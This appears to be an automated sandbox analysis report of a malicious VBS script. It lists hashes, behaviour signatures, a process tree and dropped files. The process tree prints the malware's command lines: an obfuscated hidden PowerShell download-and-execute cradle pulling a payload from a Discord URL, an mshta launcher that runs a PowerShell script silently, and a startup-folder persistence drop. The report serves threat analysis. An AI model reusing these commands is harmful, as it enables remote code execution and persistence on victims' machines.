e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs

General
Target

e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs

Filesize

828B

Completed

15-09-2021 08:33

Score
8/10
MD5

9af0d5fbc14e3ac0ae409dfef6e04228

SHA1

931b3139830e5485f198bb72ecba50475e4c8df2

SHA256

e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed

Malware Config
Signatures 7

Filter: none

Defense Evasion
Discovery
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flowpidprocess
    72020powershell.exe
  • Drops startup file
    powershell.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.vbspowershell.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies Internet Explorer settings
    mshta.exe

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Mainmshta.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exepowershell.exe

    Reported IOCs

    pidprocess
    2020powershell.exe
    2020powershell.exe
    1252powershell.exe
    1252powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exepowershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege2020powershell.exe
    Token: SeDebugPrivilege1252powershell.exe
  • Suspicious use of WriteProcessMemory
    WScript.exepowershell.exeWScript.execmd.exemshta.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1100 wrote to memory of 20201100WScript.exepowershell.exe
    PID 1100 wrote to memory of 20201100WScript.exepowershell.exe
    PID 1100 wrote to memory of 20201100WScript.exepowershell.exe
    PID 2020 wrote to memory of 6962020powershell.exeWScript.exe
    PID 2020 wrote to memory of 6962020powershell.exeWScript.exe
    PID 2020 wrote to memory of 6962020powershell.exeWScript.exe
    PID 696 wrote to memory of 324696WScript.execmd.exe
    PID 696 wrote to memory of 324696WScript.execmd.exe
    PID 696 wrote to memory of 324696WScript.execmd.exe
    PID 324 wrote to memory of 1456324cmd.exemshta.exe
    PID 324 wrote to memory of 1456324cmd.exemshta.exe
    PID 324 wrote to memory of 1456324cmd.exemshta.exe
    PID 1456 wrote to memory of 12521456mshta.exepowershell.exe
    PID 1456 wrote to memory of 12521456mshta.exepowershell.exe
    PID 1456 wrote to memory of 12521456mshta.exepowershell.exe
Processes 6
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"
    Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results
      Blocklisted process makes network request
      Drops startup file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        Suspicious use of WriteProcessMemory
        PID:696
        • C:\Windows\System32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          Suspicious use of WriteProcessMemory
          PID:324
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            Modifies Internet Explorer settings
            Suspicious use of WriteProcessMemory
            PID:1456
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              PID:1252
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                    Privilege Escalation
                      Replay Monitor
                      00:00 00:00
                      Downloads
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

                        MD5

                        715a8616bed900968c1073f51a046daa

                        SHA1

                        995665c72cfa9c88d8edab3e6212b17ac479aab8

                        SHA256

                        0d433c2cd57ed977bf3681c0b0eb87acf21a237647eee1afd741c008fe22740e

                        SHA512

                        8c99f8ba6b03e4bca03116132dd93bea84e8fd0e49a0f7b67d46533e0e735a0c3301bde4c18e6e45659e8fa3f68fcf12c78017d9740c5220d76bfe4b2908a8a1

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                        MD5

                        614da39dd1b9bc0cad2bf9331f98340c

                        SHA1

                        72dd5336860a1a3e500f779f78a935d84970c14d

                        SHA256

                        266e4fb9d33676d994247bd0136bf588f7811cf2c325fa82fddbd77a6d8c7663

                        SHA512

                        e846c6a133551925df78c7029a9051f390736acc13ce75a7ab64e91e4283f785aa057af8427b1b0f01320685647bb3021d1bdc09ea6baa8d6d7bbb2a2c86196c

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS

                        MD5

                        558a8b7b3fdef4ca79110f8cfd126694

                        SHA1

                        d6e96ca27f701b3f4c24885dacd14c762a9d36b0

                        SHA256

                        38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

                        SHA512

                        37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

                      • C:\Users\Admin\AppData\Roaming\SystemLogin.bat

                        MD5

                        7f85382953fde20b101039d48673dbd2

                        SHA1

                        5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

                        SHA256

                        fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

                        SHA512

                        6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

                      • C:\Users\Public\myScript.ps1

                        MD5

                        317f5c7ef5b887966f963c21a60e2889

                        SHA1

                        5078bdb3e7376202c7253a8b428a360e1c047863

                        SHA256

                        cd7143c00ef7711ccdcc6877d6d393e4f6e2bb2aef26bf2214b81e660f7c7cdd

                        SHA512

                        e4d6590082671997ef08550d48b5ff43dd63a1811c4b883bbe75a9a5e22087b5928be43e624632bdaf8c01d4334ae397c672d1695900d1bd25e7a27a03b10750

                      • memory/324-76-0x0000000000000000-mapping.dmp

                      • memory/696-72-0x0000000000000000-mapping.dmp

                      • memory/1100-60-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmp

                      • memory/1252-85-0x000000001AC34000-0x000000001AC36000-memory.dmp

                      • memory/1252-78-0x0000000000000000-mapping.dmp

                      • memory/1252-84-0x000000001AC30000-0x000000001AC32000-memory.dmp

                      • memory/1252-91-0x0000000002520000-0x0000000002522000-memory.dmp

                      • memory/1456-77-0x0000000000000000-mapping.dmp

                      • memory/2020-71-0x000000001B610000-0x000000001B611000-memory.dmp

                      • memory/2020-70-0x0000000001FE0000-0x0000000001FE2000-memory.dmp

                      • memory/2020-69-0x000000001B9E0000-0x000000001B9E1000-memory.dmp

                      • memory/2020-68-0x0000000002974000-0x0000000002976000-memory.dmp

                      • memory/2020-67-0x0000000001E40000-0x0000000001E41000-memory.dmp

                      • memory/2020-66-0x0000000001E10000-0x0000000001E11000-memory.dmp

                      • memory/2020-63-0x0000000002970000-0x0000000002972000-memory.dmp

                      • memory/2020-65-0x000000001AD60000-0x000000001AD61000-memory.dmp

                      • memory/2020-64-0x0000000001CA0000-0x0000000001CA1000-memory.dmp

                      • memory/2020-61-0x0000000000000000-mapping.dmp